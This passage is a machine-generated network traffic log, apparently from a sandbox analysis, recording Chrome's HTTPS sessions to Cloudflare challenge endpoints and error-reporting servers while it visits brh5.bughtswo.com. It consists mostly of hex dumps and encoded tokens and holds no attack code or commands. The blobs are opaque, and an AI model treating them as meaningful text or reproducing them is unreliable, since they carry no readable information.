                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:59 UTC3192OUTData Raw: 76 5f 38 66 65 36 35 34 62 63 32 38 36 63 37 64 30 62 3d 47 33 4a 72 52 72 32 72 34 72 76 72 44 42 62 58 42 62 77 72 42 4c 66 70 48 74 42 50 62 48 56 46 62 71 77 62 6b 6d 78 6b 58 45 48 62 66 4c 48 70 73 78 45 32 62 77 62 4a 4c 42 64 6b 6e 62 24 78 62 70 73 2d 64 72 50 73 62 51 72 42 73 64 42 4f 35 63 6b 64 62 65 72 35 35 38 62 30 78 62 34 30 62 4a 77 4c 62 54 48 78 42 64 36 6d 74 70 62 64 63 41 62 45 70 31 6e 62 42 33 6b 25 32 62 64 78 42 59 47 30 42 44 34 6a 48 4d 63 72 35 4c 71 33 49 49 6b 77 4f 62 48 54 45 62 66 70 59 64 73 24 62 31 31 78 39 6b 75 4f 47 57 5a 72 4c 43 44 6d 51 35 6a 74 50 71 74 54 77 24 4f 47 50 62 50 64 62 4a 58 73 62 57 30 33 62 4f 4c 6b 77 78 4c 72 62 70 78 4c 54 45 66 33 61 45 78 33 57 47 62 56 69 45 52 35 49 6f 31 66 55 72 48 56
                                                            Data Ascii: v_8fe654bc286c7d0b=G3JrRr2r4rvrDBbXBbwrBLfpHtBPbHVFbqwbkmxkXEHbfLHpsxE2bwbJLBdknb$xbps-drPsbQrBsdBO5ckdber558b0xb40bJwLbTHxBd6mtpbdcAbEp1nbB3k%2bdxBYG0BD4jHMcr5Lq3IIkwObHTEbfpYds$b11x9kuOGWZrLCDmQ5jtPqtTw$OGPbPdbJXsbW03bOLkwxLrbpxLTEf3aEx3WGbViER5Io1fUrHV
                                                            2025-01-07 19:24:59 UTC759INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:59 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 152860
                                                            Connection: close
                                                            cf-chl-gen: UpIZY+AvdipWMEvyf6AyYrV9n8KOMVh3exghJc2u6+nAlA/p+H/+tyAMGhLuhU5q1Bdv8PyAx4as7anh5+og1XN9o7Do8eJd+9flFkWctoU6zo+mLK/dWNmyT5RfL8Kx/HbpMMciu6+PQ/8XSA0q9nmyF3DbSVtyFS9lKEC9oIKznxm3UYHmIMuFoJcL+ObzKtmUTJn3gmJrKwhD6W9+sikWaPFACzZ96HTeI6V3GufdJIaeoiDx5N5FT9R73wAbkv4XsTN0R0lLmWVoh312HcSlwLvJ61tP9aCy8hL5foJKOgt/4ZGyDgzY2rvu1YIyqe6KTk15dux1YqcRl29tXmzQpBvYgHO7t/EOvZHImQm3LhKj7KTP0XIYdP7767HtVD0eOkWKGUkm4wddyEk5llVhkxYB8p+ZyLFl1GnnXrWM8XFmW6vXUr1LONkqrxUnNmU9A9D3UBT6VjvbOvmSKAboK/MtOYClxff7UIfqzTgSOlNgPTN6QrX9fA==$RuQTRcQfbhEnB70g
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c9afed422d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:59 UTC610INData Raw: 66 57 4f 49 65 58 4f 59 57 6d 35 70 5a 6f 70 61 59 59 46 32 6f 48 69 6d 67 35 78 35 64 4a 57 70 5a 58 61 72 68 58 36 6c 6e 70 43 52 74 61 32 59 73 58 4f 34 75 4b 65 34 71 37 65 39 75 38 53 61 73 5a 4f 51 77 34 69 70 6f 59 6e 45 78 36 57 39 72 49 53 67 76 4a 48 4a 74 39 69 70 7a 4a 75 39 6d 62 48 66 72 36 72 43 74 61 4c 69 30 64 65 65 6f 72 32 68 74 75 6d 74 71 75 48 45 73 4e 4f 75 77 62 61 74 34 4d 57 36 73 66 4b 35 78 39 62 78 77 4e 67 45 35 4e 58 75 2b 66 50 55 39 74 66 65 32 74 59 4f 42 67 48 4b 79 51 58 30 30 78 54 53 46 52 49 59 31 68 72 78 37 67 38 52 45 41 33 65 33 75 34 45 46 4f 66 79 4b 51 7a 6f 2b 4f 45 48 37 78 48 6c 42 65 63 73 4d 52 6a 77 44 2f 45 58 39 53 6f 4b 4e 30 4d 58 2f 52 41 56 46 52 58 36 49 67 51 44 4b 30 6b 48 48 7a 34 75 50 45 4d
                                                            Data Ascii: fWOIeXOYWm5pZopaYYF2oHimg5x5dJWpZXarhX6lnpCRta2YsXO4uKe4q7e9u8SasZOQw4ipoYnEx6W9rISgvJHJt9ipzJu9mbHfr6rCtaLi0deeor2htumtquHEsNOuwbat4MW6sfK5x9bxwNgE5NXu+fPU9tfe2tYOBgHKyQX00xTSFRIY1hrx7g8REA3e3u4EFOfyKQzo+OEH7xHlBecsMRjwD/EX9SoKN0MX/RAVFRX6IgQDK0kHHz4uPEM
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 34 5a 53 6b 35 58 50 6b 39 68 50 6d 46 46 52 6c 73 6c 5a 56 63 37 5a 32 70 65 4c 6d 4a 66 59 58 56 4a 59 30 78 46 4e 48 5a 56 67 47 74 77 55 31 38 38 68 44 39 66 67 30 4e 39 69 32 78 6e 66 34 61 4c 61 59 42 4f 6b 56 5a 73 53 6c 42 73 61 34 6c 72 63 6f 35 72 6d 57 4a 7a 70 5a 71 50 6d 58 68 30 68 71 56 31 6d 47 36 63 68 36 53 4d 65 35 4f 71 73 59 6c 7a 70 34 53 57 69 37 61 66 6b 37 6c 2b 6e 49 79 63 6c 4a 53 36 6f 38 62 47 70 73 53 33 79 73 4f 74 76 5a 43 6d 30 61 43 2b 6c 39 69 75 78 63 79 77 6d 63 6e 59 6d 4e 76 63 74 72 7a 47 73 39 71 39 31 4c 2b 6a 70 38 76 4e 33 63 44 44 35 4d 7a 31 31 4e 66 43 77 73 4c 4f 2b 72 57 35 2b 4f 44 41 30 4e 62 63 75 74 41 42 77 37 38 46 33 67 76 46 78 51 6e 77 7a 78 50 6d 37 4d 6f 4c 45 64 50 51 43 65 34 62 31 76 49 5a 41
                                                            Data Ascii: 4ZSk5XPk9hPmFFRlslZVc7Z2peLmJfYXVJY0xFNHZVgGtwU188hD9fg0N9i2xnf4aLaYBOkVZsSlBsa4lrco5rmWJzpZqPmXh0hqV1mG6ch6SMe5OqsYlzp4SWi7afk7l+nIyclJS6o8bGpsS3ysOtvZCm0aC+l9iuxcywmcnYmNvctrzGs9q91L+jp8vN3cDD5Mz11NfCwsLO+rW5+ODA0NbcutABw78F3gvFxQnwzxPm7MoLEdPQCe4b1vIZA
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 54 56 6c 77 6e 59 31 59 6e 51 47 4d 71 61 48 41 2b 58 31 49 31 55 56 4e 58 52 6a 4a 45 65 46 51 36 56 6d 43 41 57 6a 74 63 65 6d 4e 36 51 55 57 4a 53 6f 6c 41 63 49 56 76 57 6f 74 75 53 34 35 6f 56 32 69 45 63 35 64 6f 6e 33 6d 63 66 6e 70 34 6b 70 71 44 5a 71 64 7a 61 47 53 61 5a 6d 52 70 73 4c 42 71 69 71 4b 45 68 58 52 32 71 72 57 35 72 70 75 48 6c 48 79 61 6e 36 53 39 75 6f 4c 46 68 5a 53 32 6c 71 69 70 70 4d 79 43 77 34 75 2b 72 4b 65 74 79 70 50 57 75 4a 47 37 6d 62 58 4c 31 4a 65 67 72 4f 4c 4e 72 35 6e 47 35 65 50 48 34 62 6a 76 32 63 4b 37 70 4f 7a 75 30 75 2f 41 75 4e 66 55 31 50 54 74 33 51 47 39 38 63 72 51 33 66 50 67 39 4e 72 43 38 39 33 65 32 73 7a 39 34 65 4c 75 38 67 54 30 45 67 72 50 31 2b 6a 7a 30 74 6a 7a 30 52 44 31 41 75 34 53 2b 66
                                                            Data Ascii: TVlwnY1YnQGMqaHA+X1I1UVNXRjJEeFQ6VmCAWjtcemN6QUWJSolAcIVvWotuS45oV2iEc5don3mcfnp4kpqDZqdzaGSaZmRpsLBqiqKEhXR2qrW5rpuHlHyan6S9uoLFhZS2lqippMyCw4u+rKetypPWuJG7mbXL1JegrOLNr5nG5ePH4bjv2cK7pOzu0u/AuNfU1PTt3QG98crQ3fPg9NrC893e2sz94eLu8gT0EgrP1+jz0tjz0RD1Au4S+f
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 53 55 70 45 58 43 6c 63 51 6d 45 73 65 45 52 6d 5a 6d 64 50 65 56 77 2b 53 58 74 50 64 44 61 45 59 30 4a 56 61 47 68 64 61 32 70 70 65 56 6d 4d 54 32 5a 78 56 45 79 49 5a 58 61 47 61 33 71 49 63 57 31 30 57 46 31 73 63 31 64 59 65 47 4e 79 6d 58 79 44 6c 71 79 45 61 59 4b 4a 6e 4b 75 75 71 4b 75 44 71 62 47 4b 71 4c 71 34 63 61 74 37 71 35 4b 45 67 6e 79 6c 75 72 69 70 71 4b 4f 4c 76 36 57 78 30 62 2b 75 76 36 2f 52 71 4d 48 53 6b 63 75 59 70 5a 7a 48 30 62 61 63 30 4d 44 54 77 4d 4c 6c 35 72 65 6d 6e 72 6e 69 32 64 37 79 34 39 37 67 73 63 48 47 78 4f 7a 51 75 76 7a 31 32 66 54 59 2f 73 44 43 7a 74 6a 39 30 2b 66 70 2b 67 50 71 79 75 67 4b 41 4e 44 38 42 65 2f 72 35 66 63 43 37 4e 59 48 38 50 50 55 38 77 38 43 36 2f 4c 73 35 41 62 35 47 50 72 71 4a 50 6f
                                                            Data Ascii: SUpEXClcQmEseERmZmdPeVw+SXtPdDaEY0JVaGhda2ppeVmMT2ZxVEyIZXaGa3qIcW10WF1sc1dYeGNymXyDlqyEaYKJnKuuqKuDqbGKqLq4cat7q5KEgnyluripqKOLv6Wx0b+uv6/RqMHSkcuYpZzH0bac0MDTwMLl5remnrni2d7y497gscHGxOzQuvz12fTY/sDCztj90+fp+gPqyugKAND8Be/r5fcC7NYH8PPU8w8C6/Ls5Ab5GPrqJPo
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 46 39 49 52 45 4e 53 55 69 31 39 65 58 42 4a 65 48 56 76 55 6e 52 41 54 34 4a 78 53 46 52 70 58 6c 61 4a 59 30 78 75 62 56 35 6f 58 59 70 57 64 55 2b 4b 64 5a 31 32 61 58 6d 67 61 56 68 66 70 4a 56 6d 6b 56 2b 47 68 33 71 70 68 57 69 51 72 6e 79 47 6f 58 52 2f 62 57 32 4a 72 5a 46 34 6b 4a 47 39 71 48 32 63 74 35 6e 41 66 34 4b 79 6e 4c 6d 41 6e 37 71 2f 6c 35 36 59 71 36 57 4a 78 36 2f 52 74 61 2b 6f 77 37 72 57 7a 4c 43 6f 75 64 2f 42 73 64 58 45 32 63 69 6c 74 72 6a 63 36 5a 2b 36 37 64 69 6e 79 65 71 76 31 65 58 54 35 39 4c 4f 74 76 61 38 75 65 76 62 77 4e 41 45 39 50 77 43 39 39 50 43 2f 50 33 30 39 2b 2f 5a 2f 51 6e 79 35 76 33 70 41 2b 6e 6f 34 78 48 75 33 50 55 56 45 52 7a 62 46 4e 6f 52 37 77 59 55 49 77 49 44 46 67 51 76 4c 79 67 6b 45 78 4c 74
                                                            Data Ascii: F9IRENSUi19eXBJeHVvUnRAT4JxSFRpXlaJY0xubV5oXYpWdU+KdZ12aXmgaVhfpJVmkV+Gh3qphWiQrnyGoXR/bW2JrZF4kJG9qH2ct5nAf4KynLmAn7q/l56Yq6WJx6/Rta+ow7rWzLCoud/BsdXE2ciltrjc6Z+67dinyeqv1eXT59LOtva8uevbwNAE9PwC99PC/P309+/Z/Qny5v3pA+no4xHu3PUVERzbFNoR7wYUIwIDFgQvLygkExLt
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 52 34 58 48 77 37 66 46 78 31 64 6b 42 52 59 48 5a 77 4f 33 6c 2f 67 7a 2b 45 69 6b 39 63 57 34 2b 50 59 30 79 53 56 35 4a 6a 6d 70 5a 6f 5a 35 2b 61 63 48 53 65 59 34 52 30 70 4b 4b 55 6b 35 31 35 68 59 70 6d 6a 57 69 72 73 6f 43 4f 66 32 2b 72 6b 70 65 30 6c 33 32 6f 71 58 71 50 6d 72 32 67 77 61 4b 53 76 35 79 6d 78 6f 71 6b 6e 38 36 4d 77 38 75 68 71 4c 44 4b 74 73 53 35 31 36 37 4d 74 64 75 59 6e 74 36 62 77 74 2f 6a 35 37 7a 43 77 72 72 42 78 73 32 71 77 73 76 4e 35 4d 6a 4f 33 72 37 34 78 4d 6a 55 32 2f 43 31 39 75 72 30 38 41 48 74 2b 64 72 77 36 4f 66 61 42 76 58 46 44 51 62 75 33 75 6f 54 41 50 50 75 45 4f 6f 46 37 52 66 36 46 78 49 61 33 68 45 52 49 4e 6f 41 2f 76 63 52 46 69 62 39 34 77 6e 72 43 52 48 73 2b 68 73 55 4b 43 38 52 39 67 6b 6f 46
                                                            Data Ascii: R4XHw7fFx1dkBRYHZwO3l/gz+Eik9cW4+PY0ySV5JjmpZoZ5+acHSeY4R0pKKUk515hYpmjWirsoCOf2+rkpe0l32oqXqPmr2gwaKSv5ymxoqkn86Mw8uhqLDKtsS5167MtduYnt6bwt/j57zCwrrBxs2qwsvN5MjO3r74xMjU2/C19ur08AHt+drw6OfaBvXFDQbu3uoTAPPuEOoF7Rf6FxIa3hERINoA/vcRFib94wnrCRHs+hsUKC8R9gkoF
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 42 63 31 67 37 58 34 64 64 64 58 35 43 5a 59 4e 4b 62 57 43 4e 53 49 68 4d 55 49 4f 58 59 6f 52 73 6a 5a 5a 35 6e 46 35 79 66 32 74 38 6d 33 69 48 63 58 4e 39 71 6d 71 68 6f 34 6d 6a 67 36 35 36 61 6e 4f 51 66 72 64 30 73 70 4b 37 65 33 4f 47 75 61 71 68 65 72 47 34 6d 61 36 46 6b 71 53 39 77 70 66 49 79 37 36 72 79 36 53 30 6b 63 4c 52 78 62 4f 70 6b 4d 75 78 79 39 36 61 79 62 71 78 75 4a 75 79 70 70 2f 61 71 4c 58 73 78 61 66 67 75 61 2b 75 76 74 33 72 72 2f 62 6c 39 73 54 31 39 4c 58 51 75 73 36 35 2b 74 6a 7a 34 41 44 6d 42 65 59 42 42 50 50 61 2b 41 48 77 2b 41 33 4b 30 51 72 6e 30 42 50 72 41 67 51 52 32 66 76 74 36 66 54 72 42 50 37 75 45 66 58 6b 2f 52 58 6e 36 65 73 71 2f 41 67 4f 4d 78 50 72 35 69 30 48 45 68 45 53 4f 41 38 39 44 68 73 4d 48 30
                                                            Data Ascii: Bc1g7X4dddX5CZYNKbWCNSIhMUIOXYoRsjZZ5nF5yf2t8m3iHcXN9qmqho4mjg656anOQfrd0spK7e3OGuaqherG4ma6FkqS9wpfIy76ry6S0kcLRxbOpkMuxy96aybqxuJuypp/aqLXsxafgua+uvt3rr/bl9sT19LXQus65+tjz4ADmBeYBBPPa+AHw+A3K0Qrn0BPrAgQR2fvt6fTrBP7uEfXk/RXn6esq/AgOMxPr5i0HEhESOA89DhsMH0
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 59 6e 4a 54 64 31 74 68 5a 6e 78 50 68 47 5a 4c 6c 56 4e 76 59 58 56 36 61 58 4e 78 64 57 74 6f 59 47 78 65 6f 70 4e 39 63 48 57 70 6c 71 69 61 67 58 6d 64 70 47 69 78 62 71 6d 50 70 6d 6d 45 64 33 6d 38 6e 48 32 48 66 4c 79 76 75 34 4f 69 67 38 57 58 75 4a 57 30 6d 70 6d 33 68 61 4f 70 7a 38 57 50 30 4d 36 70 71 39 43 53 78 4d 65 6e 73 37 7a 54 31 35 69 79 74 64 54 69 34 73 44 45 79 4d 4c 4b 34 4d 4f 38 36 39 69 70 30 71 2f 4a 38 4f 4c 34 34 39 62 6f 2b 39 48 54 74 2f 44 2b 38 38 48 52 34 73 58 32 42 64 58 78 78 76 33 58 43 38 63 4d 34 51 38 51 79 75 2f 53 36 2b 72 76 7a 2b 2f 5a 42 78 54 35 46 75 76 32 48 76 33 38 44 75 54 6e 2f 52 54 39 49 77 6f 41 43 67 4c 34 4c 77 62 75 45 66 49 50 42 77 2f 72 4d 2f 45 57 4e 53 73 63 44 78 59 35 4f 42 34 76 49 77 51
                                                            Data Ascii: YnJTd1thZnxPhGZLlVNvYXV6aXNxdWtoYGxeopN9cHWplqiagXmdpGixbqmPpmmEd3m8nH2HfLyvu4Oig8WXuJW0mpm3haOpz8WP0M6pq9CSxMens7zT15iytdTi4sDEyMLK4MO869ip0q/J8OL449bo+9HTt/D+88HR4sX2BdXxxv3XC8cM4Q8Qyu/S6+rvz+/ZBxT5Fuv2Hv38DuTn/RT9IwoACgL4LwbuEfIPBw/rM/EWNSscDxY5OB4vIwQ
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 47 2b 4c 61 30 75 45 67 48 4b 49 6d 49 56 33 62 6f 52 71 62 56 35 58 61 59 74 7a 6d 47 36 54 65 70 6d 63 70 59 4f 61 70 6e 35 2b 71 6e 2b 41 6f 47 75 67 67 49 69 34 67 71 32 56 65 6e 79 62 70 37 36 2f 6f 61 36 78 6b 4c 43 65 74 4d 65 4b 69 61 4c 44 69 34 61 4a 6f 72 32 6b 6a 35 47 6b 79 4b 2b 72 74 38 66 53 73 61 71 32 30 72 57 68 30 75 53 62 77 61 2f 47 30 37 72 64 70 2b 54 4d 7a 50 48 52 38 64 2f 50 36 2b 62 68 77 64 71 32 75 66 6e 70 39 76 66 39 77 4e 49 43 38 64 72 56 2b 50 58 66 35 67 58 4b 39 73 7a 4d 7a 77 76 76 33 64 48 31 41 77 50 67 45 52 59 4b 45 68 73 52 2b 42 51 64 46 66 48 67 45 42 41 55 41 65 6b 70 36 4f 4c 2b 4c 69 6e 73 37 69 72 76 49 41 62 7a 4c 41 2f 32 46 42 45 74 37 78 55 71 50 69 39 42 50 54 4a 42 48 6a 63 30 52 51 6f 64 54 41 77 6d
                                                            Data Ascii: G+La0uEgHKImIV3boRqbV5XaYtzmG6TepmcpYOapn5+qn+AoGuggIi4gq2Venybp76/oa6xkLCetMeKiaLDi4aJor2kj5GkyK+rt8fSsaq20rWh0uSbwa/G07rdp+TMzPHR8d/P6+bhwdq2ufnp9vf9wNIC8drV+PXf5gXK9szMzwvv3dH1AwPgERYKEhsR+BQdFfHgEBAUAekp6OL+Lins7irvIAbzLA/2FBEt7xUqPi9BPTJBHjc0RQodTAwm


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.84973435.190.80.14435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:59 UTC536OUTOPTIONS /report/v4?s=sIKQxfDh6dFZESxWI%2F6Om6jn6s%2BNOixtlheTS%2BHZbxRpBq3NEh1byGQKpNQBnR7RhZpfFSSVyOYZvh0QaOCq4AiUwwpZLgfxHKNmMRvfDWz4RzdLRmxzwj2M1kvS0w%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://brh5.bughtswo.com
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:59 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: POST, OPTIONS
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Tue, 07 Jan 2025 19:24:59 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.84973535.190.80.14435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:01 UTC476OUTPOST /report/v4?s=sIKQxfDh6dFZESxWI%2F6Om6jn6s%2BNOixtlheTS%2BHZbxRpBq3NEh1byGQKpNQBnR7RhZpfFSSVyOYZvh0QaOCq4AiUwwpZLgfxHKNmMRvfDWz4RzdLRmxzwj2M1kvS0w%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 428
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:01 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 72 68 35 2e 62 75 67 68 74 73 77 6f 2e 63 6f 6d 2f 74 67 73 30 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":142,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://brh5.bughtswo.com/tgs0/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
                                                            2025-01-07 19:25:01 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Tue, 07 Jan 2025 19:25:01 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.849737104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:01 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:02 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 19:25:01 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: RoVGzrmHokensldrRbvoZynVxI9Vep1tydU=$jBnxV4I/PXH1JLpQ
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654d708d98c11-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.849738104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:01 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe654bc286c7d0b/1736277899837/y5opRdNzxhmLLrW HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:01 UTC200INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:01 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654d6fc3f72ad-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2b 00 00 00 56 08 02 00 00 00 d9 83 f8 88 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR+VIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.849740104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:02 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe654bc286c7d0b/1736277899837/0f8396233de30b1027fe5c528fbab38c7649993ff1d372703ff5864234108da6/ZukX3ZIDoYG8U1y HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:02 UTC143INHTTP/1.1 401 Unauthorized
                                                            Date: Tue, 07 Jan 2025 19:25:02 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            2025-01-07 19:25:02 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 34 4f 57 49 7a 33 6a 43 78 41 6e 5f 6c 78 53 6a 37 71 7a 6a 48 5a 4a 6d 54 5f 78 30 33 4a 77 50 5f 57 47 51 6a 51 51 6a 61 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gD4OWIz3jCxAn_lxSj7qzjHZJmT_x03JwP_WGQjQQjaYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                            2025-01-07 19:25:02 UTC1INData Raw: 4a
                                                            Data Ascii: J


